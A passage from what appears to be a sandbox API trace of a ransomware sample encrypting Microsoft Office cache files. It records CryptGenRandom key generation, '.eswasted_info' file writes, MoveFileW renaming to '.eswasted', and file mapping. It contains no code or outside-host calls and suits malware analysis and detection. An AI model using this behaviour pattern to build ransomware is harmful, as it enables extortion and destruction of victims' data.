lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.327] SetEndOfFile (hFile=0x110) returned 1 [0071.327] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.327] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.327] lstrcpyW (in: lpString1=0x4e1b50, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.328] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.329] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0071.329] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x7976 [0071.329] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7976) returned 0xb10000 [0071.329] CloseHandle (hObject=0xfc) returned 1 [0071.352] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.353] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0071.353] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.353] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.354] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.354] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.362] SetEndOfFile (hFile=0x110) returned 1 [0071.364] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.364] CloseHandle (hObject=0x110) returned 1 [0071.366] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.366] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e40e8 | out: hHeap=0x4a0000) returned 1 [0071.366] _aulldvrm () returned 0x0 [0071.366] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.366] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.367] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.367] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0071.367] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ac) returned 0x4f6210 [0071.367] lstrcpyW (in: lpString1=0x4f62b2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.367] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.367] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.367] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.367] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.367] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.369] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.370] SetEndOfFile (hFile=0x110) returned 1 [0071.370] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.370] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.370] lstrcpyW (in: lpString1=0x4f62b2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.370] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted")) returned 1 [0071.371] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0071.371] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0071.371] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x10b2 [0071.371] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b2) returned 0x2d0000 [0071.371] CloseHandle (hObject=0x100) returned 1 [0071.375] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.376] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0071.376] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.376] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.377] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.377] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.388] SetEndOfFile (hFile=0x110) returned 1 [0071.389] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.390] CloseHandle (hObject=0x110) returned 1 [0071.391] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0071.391] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd690 | out: hHeap=0x4a0000) returned 1 [0071.391] _aulldvrm () returned 0x0 [0071.391] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.392] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.392] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.392] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0071.392] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2aa) returned 0x4f6210 [0071.392] lstrcpyW (in: lpString1=0x4f62b0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.392] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.392] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.393] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.393] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.393] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.394] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.395] SetEndOfFile (hFile=0x110) returned 1 [0071.395] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.395] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.395] lstrcpyW (in: lpString1=0x4f62b0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.eswasted")) returned 1 [0071.397] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0071.397] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0071.397] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x1915 [0071.397] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1915) returned 0x2d0000 [0071.397] CloseHandle (hObject=0x100) returned 1 [0071.399] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.400] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0071.400] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.400] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.401] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.401] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.409] SetEndOfFile (hFile=0x110) returned 1 [0071.412] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.412] CloseHandle (hObject=0x110) returned 1 [0071.413] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0071.413] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0071.414] _aulldvrm () returned 0x0 [0071.414] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.414] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.414] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.414] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.414] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4e1368 [0071.415] lstrcpyW (in: lpString1=0x4e1400, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.415] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.415] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.415] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.415] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.415] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.416] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.417] SetEndOfFile (hFile=0x110) returned 1 [0071.417] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.417] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.417] lstrcpyW (in: lpString1=0x4e1400, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.418] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.418] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0071.418] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x412b [0071.418] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x412b) returned 0x2d0000 [0071.418] CloseHandle (hObject=0xf8) returned 1 [0071.421] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.422] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0071.422] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.422] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.423] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.423] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.477] SetEndOfFile (hFile=0x110) returned 1 [0071.479] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.479] CloseHandle (hObject=0x110) returned 1 [0071.481] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0071.481] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e41e0 | out: hHeap=0x4a0000) returned 1 [0071.481] _aulldvrm () returned 0x0 [0071.481] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.482] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.482] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.482] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0071.482] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ac) returned 0x4f6210 [0071.482] lstrcpyW (in: lpString1=0x4f62b2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.482] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.482] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.483] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.483] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.483] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.484] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.485] SetEndOfFile (hFile=0x110) returned 1 [0071.485] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.486] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.486] lstrcpyW (in: lpString1=0x4f62b2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted")) returned 1 [0071.486] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0071.486] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0071.487] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x10b2 [0071.487] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b2) returned 0x2d0000 [0071.487] CloseHandle (hObject=0x100) returned 1 [0071.489] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.490] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0071.490] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.490] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.491] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.491] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.501] SetEndOfFile (hFile=0x110) returned 1 [0071.503] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.503] CloseHandle (hObject=0x110) returned 1 [0071.505] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0071.505] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de0d8 | out: hHeap=0x4a0000) returned 1 [0071.505] _aulldvrm () returned 0x0 [0071.505] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.506] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.506] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.506] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0071.506] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c0) returned 0x4e1368 [0071.506] lstrcpyW (in: lpString1=0x4e141e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.506] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.506] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.507] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.507] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.507] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.508] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.509] SetEndOfFile (hFile=0x110) returned 1 [0071.509] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.509] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.509] lstrcpyW (in: lpString1=0x4e141e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All 